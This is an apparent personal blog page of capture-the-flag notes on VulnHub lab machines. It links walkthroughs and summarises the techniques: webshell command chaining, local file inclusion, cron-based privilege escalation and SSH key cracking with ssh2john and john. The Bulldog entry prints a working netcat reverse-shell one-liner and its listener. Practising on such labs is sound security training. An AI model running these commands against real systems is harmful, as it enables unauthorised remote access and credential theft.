Showing posts from November, 2018

55 VM Bulldog 1

Walkthru:

A. https://medium.com/@krankoPwnz/walkthrough-for-bulldog-on-vulnhub-com-c834573e28fd [password hash in source, webshell with limited commands but use || or && to run any command, crontab, python reverse shell for priv escalation]

B. https://securitybytes.io/vulnhub-com-bulldog-ctf-solution-b00b4640327a [pwd in binary file, extract it using strings file]

C. https://hack-ed.net/2017/11/09/bulldog-ctf-walkthrough/ [read files from webshell]

D. https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/ [upgrade shell]

Notes: There was a crontab file that runs daily. I tried to add a bash reverse shell, added the user to the sudoers file, and a PHP reverse shell, but none worked. But I was able to create a file using that crontab, which led me to believe it is possible to perform escalation using it. I used the rm cmd to perform the reverse shell.

Reverse shell:

    rm /tmp/f|mkfifo /tmp/f|cat /tmp/f|/bin/sh -i 2>&1|nc 172.16.1.100 1234 >/tmp/f

    nc -nvlp 1234

54 VM W1R3S: 1.0.1

Walkthru:

A. https://github.com/nbrisset/CTF/tree/master/CTF-VulnLabs/w1r3s [local file inclusion, ftp, Cuppa CMS vulnerability, LFI working using CLI but not browser, john, sudo su for privilege escalation]

B. https://blog.barradell-johns.com/index.php/2018/06/25/w1r3s-writeup/ [I was getting the same response from the server for LFI. Looks like it needed encoding. "After a bit of research I found I may have better luck with encoded url (url encoding) params, so I utilised cURL"]

Notes:

53 VM Basic Pentest 2

Walkthru:

A. https://resources.infosecinstitute.com/basic-pentesting-2-ctf-walkthrough/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+infosecResources+%28InfoSec+Resources%29 [brute force passphrases for ssh login, convert private key to another format so we can use john to brute force the key]

B. http://www.hackingarticles.in/hack-the-basic-pentesting2-vm-ctf-challenge/ [use ssh2john to convert this SSH key into a crackable file for john the ripper.]

C. https://medium.com/@nelsoncoln/basic-pentesting-2-vm-walkthrough-383047900187 [vim.basic have root permissions, that means that I could probably read the file in kay’s directory,]

Notes: [from walkthrough B]

    python ssh2john key > ssh_login

    john ssh_login